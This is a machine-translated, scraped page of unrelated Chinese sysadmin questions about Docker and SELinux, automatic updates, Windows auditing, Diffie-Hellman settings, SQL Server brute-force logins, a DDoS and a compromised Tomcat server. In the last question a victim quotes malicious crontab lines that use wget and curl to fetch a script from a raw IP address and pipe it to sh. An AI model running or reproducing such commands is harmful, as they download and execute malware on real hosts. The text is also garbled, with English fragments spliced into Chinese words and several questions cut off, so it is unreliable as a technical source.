Docker的文档中有一篇关于Docker安全性的好文章: https : //docs.docker.com/articles/security/ 但是,我并不清楚容器中的根特权进程是如何在主机系统中运行的,以及我应该如何configurationSELinux来处理进程在容器外“泄漏”的风险。 例如,我在一个容器中运行nginx,当我在容器外部执行“ps”时,我可以看到所有的nginx进程。 根7281 4078 0 01:36? 00:00:00 nginx:主进程nginx www-data 7309 7281 0 01:36? 00:00:00 nginx:工作进程 www-data 7310 7281 0 01:36? 00:00:00 nginx:工作进程 www-data 7311 7281 0 01:36? 00:00:00 nginx:工作进程 www-data 7312 7281 0 01:36? 00:00:00 nginx:工作进程 这并不奇怪,因为这是Docker工作的方式 – 这不是虚拟化,虚拟机之外什么都不显示。 使用Docker,容器的进程在名称空间和有限权限内的主机操作系统上运行。 他们直接与主机内核通话。 在这种情况下,我相信我应该configurationSELinux来保护nginx进程而不是docker的进程,就像在没有docker的情况下运行一样。 那是对的吗? 另外,是否有任何特定的Dockerconfiguration更适合运行像nginx这样的web服务器?
我似乎无法在任何地方find一致的答案,所以我想我会问自己。 我有五个运行12.04或14.04的Ubuntu服务器,是否应该使用unattended-upgrades在这些服务器上启用自动安全更新? 或者我应该每个月都运行手动更新? 通过这个我的意思是安全/可以使这些导致任何操作系统/安全问题? 利大于弊吗?
我如何testing我的服务器的安全性? 请我知道这是一般的问题。 但我想知道是否有一个testing仪软件或Web服务检查您的服务器的所有端口,或可能的安全漏洞? 我通常检查unix权限,就是这样,但是我可以做些什么? PS。 用户不能用我的networking应用程序上传文件,所以我没有这个问题。
我有一个用户帐户不断被locking。 我试图找出是什么原因造成的。 所以我想在事件查看器中启用失败审计。 但是,我不知道如何! 如何启用审核失败,使其显示在Windows日志>安全性的DC事件查看器中? 到目前为止,我所做的步骤是: 在DC中,转到组策略pipe理编辑器>默认域策略(链接)>计算机configuration>策略> Windows设置>安全设置>本地策略>审核策略 将审核帐户login事件,目录服务访问,login事件设置为“失败”。 账户pipe理已经设置为“成功,失败”。 在DC中,启动命令提示符,键入gpupdate。 事件日志仍然只显示审计成功,即使可以检查我的用户帐户是每隔几分钟左右密码计数错误。
我们是非专家尝试 – 到目前为止未能成功 – 更新我们的Web服务器(JBoss-5.1.0.GA)设置以符合Diffie-Hellman标准。 在https://weakdh.org/sysadmin.html上运行testing后,我们被告知需要“生成新的2048位Diffie-Hellman参数”。 过去,我们使用Java keytool生成密钥,但是我们一直无法find关于使用Java keytool生成新的2048位Diffie-Hellman参数的任何信息。 有谁知道如何做到这一点,或可以指出我们在正确的方向吗? 谢谢!
我有一个问题,并不知道如何处理它。 我在Windows 2008 R2服务器上有一个SQL Server。 这个SQL Server 2005被用于从位于Internet上其他地方的另一个SQL Server接收数据库订阅。 我有通过防火墙打开的SQL服务器端口,但在范围内,我已经进入了其他SQL Server的IP。 这样做我希望通过该端口的连接请求不会到达SQL Server,除非这些请求来自其他SQL Server(其IP列在防火墙规则中的范围中)。 但是,当我看到日志时,有数以百计的“login失败的用户sa”条目(他们每过一秒钟都会到来)。 看来有些黑客正在蛮横猜测用户的sa密码。 但问题是,为什么Windows让这些请求到达SQL Server,即使它们不是来自防火墙范围中列出的IP地址? 什么是保护这个SQL Server的正确方法。 除了其他SQL Server的IP需要连接到此SQL Server之外,没有其他IP。 编辑 – 更多信息: 我在不同的机器上运行SQL Server端口上的telnet。 除非从防火墙范围内特别提到的机器运行,否则Telnet将失败。 所以看来,防火墙阻止的SQL Server端口罚款。 但是,那么为什么我看到这些失败的login请求从SQL Server日志中的不同IP地址用户“sa”? 黑客是否有可能通过端口80进入机器,然后以某种方式尝试连接到SQL Server? 80和443港口向所有人开放。 所有其他端口都closures,但sql服务器端口除外(只对一个特定的IP打开)。 Web服务器在端口80上没有任何东西可以导致访问者访问SQL服务器。 实际上,Web服务器中只有一个index.html(纯粹的HTML,没有连接到SQL)文件。 这只是一个testing服务器,可供将来使用。 只在SQL Server中testing数据。 编辑: 我打开了防火墙跟踪,以包括丢弃和成功的连接。 现在正在追查一切。 然后我去SQL Server日志,在那里我看到来自中国不同的IP地址的这些失败的login尝试。 但是在防火墙日志中没有这些IP地址的条目。 这怎么可能? 他们可以完全绕过防火墙到SQL服务器吗? 如果假设某些防火墙端口是可以打开的,则防火墙日志应该显示该IP地址的条目。 我完全失去了。
我的homedir下有一个名为“.gvfs”的目录。 作为我的常规用户帐户,我可以读得很好: ~ $ ls -lart ~raldi/.gvfs total 4 dr-x—— 2 raldi raldi 0 2009-05-25 22:17 . drwxr-xr-x 60 raldi raldi 4096 2009-05-25 23:08 .. ~ $ ls -d ~raldi/.gvfs dr-x—— 2 raldi raldi 0 2009-05-25 22:17 /home/raldi/.gvfs 然而,作为根,我不能“ls”甚至“ls -d”它: # ls ~raldi/.gvfs ls: cannot access /home/raldi/.gvfs: Permission denied # ls -d ~raldi/.gvfs ls: cannot […]
其中一个与我合作的网站最近开始遭到拒绝。 它开始在30k RPS,现在是在50k /分钟。 IP几乎都是独一无二的,不在同一个子网中,而且在多个国家。 他们只要求主页面。 有关如何阻止这一点的任何提示? 服务器运行在Linux上,Apache作为Web服务器。 谢谢
允许域用户在机器上启动和停止服务的最佳方法是什么? 域用户不能成为pipe理员。
在Apache Tomcat服务器上运行项目战时,我发现服务器已经被入侵。 在未知的cron上运行战争就像这样运行 [root@App2 tmp]# crontab -l -u tomcat */11 * * * * wget -O – -q http://91.230.47.40/pics/logo.jpg|sh */12 * * * * curl http://91.230.47.40/pics/logo.jpg|sh 下载的logo.jpg有一个正在下载恶意软件的shell脚本。 我在下面的网站上发现了类似的问题 Covert channels: Hiding shell scripts in PNG files 和 https://security.stackexchange.com/questions/160068/kworker34-malware-on-linux 我无法在整个代码中find此cron作业调度程序的来源。 这个cron工作 我想知道有没有人遇到这个问题? 我该如何去寻找代码中cron作业的起源。 注意: 我正在开发一个JAVA(Struts 2)+ jsp + javascript + jquery web项目。 每当我用项目的war文件启动我的tomcat时,这个cron作业就会运行,但是我无法在我的代码中find任何cron作业的调度器。 我在我的日志文件中find了以下行 [INFO] 2017-06-02 […]